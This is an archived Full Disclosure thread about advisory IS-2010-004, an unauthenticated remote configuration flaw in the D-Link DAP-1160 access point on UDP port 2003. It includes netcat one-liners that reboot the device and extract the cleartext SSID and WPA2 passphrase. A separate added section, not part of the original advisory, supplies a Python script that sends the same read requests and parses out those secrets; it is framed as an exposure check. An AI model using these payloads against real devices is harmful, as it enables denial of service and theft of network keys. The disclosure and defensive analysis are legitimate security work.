Full Disclosure mailing list archives
Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
From: Cristofaro Mune <pulsoid () icysilence org>
Date: Mon, 28 Jun 2010 17:28:33 +0200
Since the D-Link DAP-1160 is an access point and not a router, it does not have a specific WAN interface. Nonetheless, the UDP 2003 port is open and reachable from all the available interfaces on this device.

Best Regards,
Cristofaro Mune

Gary Baribault wrote:
Is that UDP 2003 open on the WAN interface as well?

Gary Baribault

On 06/28/2010 09:50 AM, Cristofaro Mune wrote:

Security Advisory

IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Advisory Information
--------------------
Published: 2010-06-28
Updated: 2010-06-28
Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06, 1.30b10, 1.31b01

Vulnerability Details
---------------------
Public References: Not Assigned

Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01.
Other models and/or firmware versions may also be affected.
Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31

Background Information:
D-Link DAP-1160 is a wireless access point that allows wireless clients connectivity to wired networks.
802.11b and 802.11g protocols are supported. WEP, WPA and WPA2 are supported.

Summary:
Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases, is possible.
Unauthenticated remote reboot of the device can also be performed.

Details:
DCCD is a UDP daemon that listens on port UDP 2003 of the device, which is likely used for easy device configuration via the DCC (D-Link Click'n Connect) protocol.
By sending properly formatted UDP datagrams to the dccd daemon it is possible to perform security-relevant operations without any previous authentication.
It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, encryption types, keys and passphrases, along with other additional information.
It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition.

POC:
- Remote reboot

python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

- Retrieving Wi-Fi SSID

python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram)

- Retrieving WPA2 PSK

python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)

Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
Possible Denial-of-Service

Solutions & Workaround:
Not available

Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory

Additional information available at http://www.icysilence.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
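The advisory gives the UDP/2003 datagram layout only as netcat one-liners. The script below is an added example, not code from the advisory or from D-Link: it builds the read request from the documented opcode and tag bytes, classifies a captured datagram (reboot versus parameter read) for triage, and extracts the cleartext value that follows "<tag> xx xx" in a reply. The advisory never says what the two "xx" bytes are; the script assumes they are a 16-bit little-endian length (zero in a request) and falls back to reading up to a NUL byte if that guess does not fit. Note that Python 2's `print` in the POC appends a newline, so the datagrams netcat actually sent ended in 0x0a; this script sends an explicit 0x00 0x00 after each tag instead. The sample reply is constructed, not captured. The reboot opcode is defined but never transmitted.

```python
#!/usr/bin/env python3
"""Added example (not from the advisory): DCC-style datagrams on UDP/2003.

Taken from IS-2010-004:
  0x05 + seven zero bytes             -> reboot (destructive, never sent here)
  0x03 + seven zero bytes + tag bytes -> read parameters
  tag 0x21 0x27 = SSID, 0x24 0x27 = WPA2 PSK (0x23 0x27 is requested with it)
  the reply carries "<tag> xx xx <cleartext value>"

ASSUMPTION (the advisory does not say): each tag is followed by a 16-bit
little-endian length, zero in a request. Wrong guess -> NUL-terminated fallback.
"""
import socket
import struct
import sys

DCC_PORT = 2003
OP_GET = 0x03
OP_REBOOT = 0x05
TAG_SSID = b"\x21\x27"
TAG_WPA2_AUX = b"\x23\x27"   # sent alongside the PSK tag in the advisory's POC
TAG_WPA2_PSK = b"\x24\x27"
TAG_NAMES = {TAG_SSID: "ssid", TAG_WPA2_AUX: "wpa2-aux", TAG_WPA2_PSK: "wpa2-psk"}


def build_get(tags):
    """Read request: opcode, seven zero bytes, then tag + 0x00 0x00 per tag."""
    return bytes([OP_GET]) + b"\x00" * 7 + b"".join(t + b"\x00\x00" for t in tags)


def describe_request(datagram):
    """Classify a captured UDP/2003 payload (e.g. pulled from a pcap).
    Returns (operation, [tag names]) so a reboot can be told from a read."""
    if len(datagram) < 8:
        return ("short", [])
    op = datagram[0]
    if op == OP_REBOOT:
        return ("reboot", [])
    if op != OP_GET:
        return ("unknown-0x%02x" % op, [])
    body = datagram[8:]
    tags = []
    for i in range(0, len(body) - 1, 4):      # assumed 2-byte tag + 2-byte length
        tag = body[i:i + 2]
        tags.append(TAG_NAMES.get(tag, tag.hex()))
    return ("get", tags)


def extract_value(reply, tag):
    """Return the cleartext bytes after '<tag> xx xx' in a reply, or None."""
    idx = reply.find(tag, 8)                  # skip the 8-byte header
    if idx < 0 or idx + 4 > len(reply):
        return None
    start = idx + 4
    length = struct.unpack("<H", reply[idx + 2:start])[0]   # ASSUMPTION: LE length
    if 0 < length <= len(reply) - start:
        return reply[start:start + length]
    end = reply.find(b"\x00", start)          # fallback: NUL-terminated value
    return reply[start:] if end < 0 else reply[start:end]


def query(host, tags, timeout=2.0):
    """Send one read request and return the raw reply, or None on timeout.
    Only reads are sent; OP_REBOOT is deliberately never transmitted."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get(tags), (host, DCC_PORT))
        try:
            reply, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return reply


def check_exposure(host):
    """Exposure check for a device you own: a cleartext SSID coming back to an
    unauthenticated read means the interface you reached it on is exposed."""
    reply = query(host, [TAG_SSID])
    return None if reply is None else extract_value(reply, TAG_SSID)


# Constructed sample reply (not captured from a device), for offline use.
SAMPLE_REPLY = (bytes([OP_GET]) + b"\x00" * 7
                + TAG_SSID + struct.pack("<H", 7) + b"MySSID1"
                + TAG_WPA2_PSK + b"\xff\xff" + b"hunter2passphrase" + b"\x00")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        ssid = check_exposure(sys.argv[1])
        print("no reply (or port filtered)" if ssid is None else "SSID: %r" % ssid)
    else:
        print(describe_request(build_get([TAG_WPA2_AUX, TAG_WPA2_PSK])))
        print(extract_value(SAMPLE_REPLY, TAG_SSID),
              extract_value(SAMPLE_REPLY, TAG_WPA2_PSK))
```

Run it with a single argument to probe one of your own access points; with no arguments it exercises the builder and parser on the constructed reply. Since the advisory lists no vendor fix and the follow-up in this thread confirms the port answers on every interface, the practical control is to filter UDP/2003 toward the device on the upstream firewall or VLAN boundary, and `describe_request` is the kind of check you would run over captured traffic to see whether anyone has been sending reads or reboots.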
Current thread:
- IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)